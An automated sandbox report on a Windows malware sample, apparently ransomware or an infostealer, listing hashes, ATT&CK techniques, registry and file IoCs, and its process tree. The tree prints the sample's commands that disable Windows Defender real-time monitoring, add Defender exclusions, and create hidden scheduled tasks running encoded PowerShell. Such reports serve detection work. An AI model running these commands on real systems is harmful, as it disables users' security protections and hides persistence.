12405a7f8f62a12fbfb93668c5d1314c88440eb9e11e37933a31d98fa73a11f6

Analysis

max time kernel
103s
max time network
106s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
11-10-2024 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
Size

6.6MB
MD5

ec105a10fbc6340a69581f36454d722f
SHA1

744eaf350ae3aa2865bc5bce43b72f5c0e6ab5c7
SHA256

12405a7f8f62a12fbfb93668c5d1314c88440eb9e11e37933a31d98fa73a11f6
SHA512

d6c5833510e50390a90a35329a30bf80af3909f871a00731dc7bfdfaea803e28929440853d106ed157431cabf3e5d5feed5635f360e02e32113c9ec87d000d59
SSDEEP

196608:66ABZOhEyu0HDsqhU8gccZ6Limi6rHTZTBq+djV:cOhEyFoq0R6Limb1B5

Score

10^/10

defense_evasion discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EiageFSkrUtPPHAL = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WJFamJaEBTfU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\cXSJtDFScnTzTGgPg = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JJyFpTQoRlUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wLIvplUSU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\EiageFSkrUtPPHAL = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fnPDPsTirKjrC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\AjAAYqfCeAnepTVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PcHRTMplLehSqKgCdGR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2060	powershell.EXE
2528	powershell.EXE
1916	powershell.exe
2220	powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Control Panel\International\Geo\Nation	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Indirect Command Execution 1 TTPs 1 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
2300	forfiles.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ggjedgimacfdgfngpbbebgmhpkfnhmkd\1.0_0\manifest.json	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Drops file in System32 directory 8 IoCs

description	ioc	Process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{C04E7587-BB46-4214-87AE-35EEE298104A}.xpi	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\WJFamJaEBTfU2\fnLTjlAAcvzyE.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\uRjkweJ.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\JJyFpTQoRlUn\xbsUJWX.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\fnPDPsTirKjrC\lDJLEqa.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\wLIvplUSU\nTlAvy.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{C04E7587-BB46-4214-87AE-35EEE298104A}.xpi	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\wLIvplUSU\InrASTC.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\WJFamJaEBTfU2\KWTlhBC.xml	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\PcHRTMplLehSqKgCdGR\KkCxZqZ.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
File created	C:\Program Files (x86)\fnPDPsTirKjrC\EAuaxsx.dll	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\thOwFuKJdpsLdjY.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
580	2568	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2000	schtasks.exe
1484	schtasks.exe
1816	schtasks.exe
1852	schtasks.exe
2872	schtasks.exe
2032	schtasks.exe
1056	schtasks.exe
2396	schtasks.exe
1520	schtasks.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
2060	powershell.EXE
2060	powershell.EXE
2060	powershell.EXE
2528	powershell.EXE
2528	powershell.EXE
2528	powershell.EXE
1916	powershell.exe
2220	powershell.EXE
2220	powershell.EXE
2220	powershell.EXE
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	2060	powershell.EXE
Token: SeDebugPrivilege	2528	powershell.EXE
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeIncreaseQuotaPrivilege	324	WMIC.exe
Token: SeSecurityPrivilege	324	WMIC.exe
Token: SeTakeOwnershipPrivilege	324	WMIC.exe
Token: SeLoadDriverPrivilege	324	WMIC.exe
Token: SeSystemProfilePrivilege	324	WMIC.exe
Token: SeSystemtimePrivilege	324	WMIC.exe
Token: SeProfSingleProcessPrivilege	324	WMIC.exe
Token: SeIncBasePriorityPrivilege	324	WMIC.exe
Token: SeCreatePagefilePrivilege	324	WMIC.exe
Token: SeBackupPrivilege	324	WMIC.exe
Token: SeRestorePrivilege	324	WMIC.exe
Token: SeShutdownPrivilege	324	WMIC.exe
Token: SeDebugPrivilege	324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	324	WMIC.exe
Token: SeRemoteShutdownPrivilege	324	WMIC.exe
Token: SeUndockPrivilege	324	WMIC.exe
Token: SeManageVolumePrivilege	324	WMIC.exe
Token: 33	324	WMIC.exe
Token: 34	324	WMIC.exe
Token: 35	324	WMIC.exe
Token: SeDebugPrivilege	2220	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2568 wrote to memory of 1484	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	30
PID 2568 wrote to memory of 1484	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	30
PID 2568 wrote to memory of 1484	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	30
PID 2568 wrote to memory of 1484	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	30
PID 2568 wrote to memory of 2128	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	32
PID 2568 wrote to memory of 2128	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	32
PID 2568 wrote to memory of 2128	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	32
PID 2568 wrote to memory of 2128	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	32
PID 2364 wrote to memory of 2060	2364	taskeng.exe	35
PID 2364 wrote to memory of 2060	2364	taskeng.exe	35
PID 2364 wrote to memory of 2060	2364	taskeng.exe	35
PID 2060 wrote to memory of 2776	2060	powershell.EXE	37
PID 2060 wrote to memory of 2776	2060	powershell.EXE	37
PID 2060 wrote to memory of 2776	2060	powershell.EXE	37
PID 2568 wrote to memory of 2644	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	41
PID 2568 wrote to memory of 2644	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	41
PID 2568 wrote to memory of 2644	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	41
PID 2568 wrote to memory of 2644	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	41
PID 2568 wrote to memory of 2112	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	43
PID 2568 wrote to memory of 2112	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	43
PID 2568 wrote to memory of 2112	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	43
PID 2568 wrote to memory of 2112	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	43
PID 2112 wrote to memory of 1944	2112	cmd.exe	45
PID 2112 wrote to memory of 1944	2112	cmd.exe	45
PID 2112 wrote to memory of 1944	2112	cmd.exe	45
PID 2112 wrote to memory of 1944	2112	cmd.exe	45
PID 2568 wrote to memory of 1684	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	46
PID 2568 wrote to memory of 1684	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	46
PID 2568 wrote to memory of 1684	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	46
PID 2568 wrote to memory of 1684	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	46
PID 1684 wrote to memory of 568	1684	cmd.exe	48
PID 1684 wrote to memory of 568	1684	cmd.exe	48
PID 1684 wrote to memory of 568	1684	cmd.exe	48
PID 1684 wrote to memory of 568	1684	cmd.exe	48
PID 2568 wrote to memory of 1816	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	49
PID 2568 wrote to memory of 1816	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	49
PID 2568 wrote to memory of 1816	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	49
PID 2568 wrote to memory of 1816	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	49
PID 2568 wrote to memory of 2108	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	51
PID 2568 wrote to memory of 2108	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	51
PID 2568 wrote to memory of 2108	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	51
PID 2568 wrote to memory of 2108	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	51
PID 2364 wrote to memory of 2528	2364	taskeng.exe	53
PID 2364 wrote to memory of 2528	2364	taskeng.exe	53
PID 2364 wrote to memory of 2528	2364	taskeng.exe	53
PID 2528 wrote to memory of 2960	2528	powershell.EXE	55
PID 2528 wrote to memory of 2960	2528	powershell.EXE	55
PID 2528 wrote to memory of 2960	2528	powershell.EXE	55
PID 2568 wrote to memory of 2180	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	58
PID 2568 wrote to memory of 2180	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	58
PID 2568 wrote to memory of 2180	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	58
PID 2568 wrote to memory of 2180	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	58
PID 2568 wrote to memory of 2300	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	60
PID 2568 wrote to memory of 2300	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	60
PID 2568 wrote to memory of 2300	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	60
PID 2568 wrote to memory of 2300	2568	2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe	60
PID 2300 wrote to memory of 1976	2300	forfiles.exe	62
PID 2300 wrote to memory of 1976	2300	forfiles.exe	62
PID 2300 wrote to memory of 1976	2300	forfiles.exe	62
PID 2300 wrote to memory of 1976	2300	forfiles.exe	62
PID 1976 wrote to memory of 1916	1976	cmd.exe	63
PID 1976 wrote to memory of 1916	1976	cmd.exe	63
PID 1976 wrote to memory of 1916	1976	cmd.exe	63
PID 1976 wrote to memory of 1916	1976	cmd.exe	63

C:\Users\Admin\AppData\Local\Temp\2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-11_ec105a10fbc6340a69581f36454d722f_bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gcgiXKtVI" /SC once /ST 01:06:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1484
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gcgiXKtVI"
  2⤵
  PID:2128
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gcgiXKtVI"
  2⤵
  PID:2644
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:568
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gueMGYjhW" /SC once /ST 08:10:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
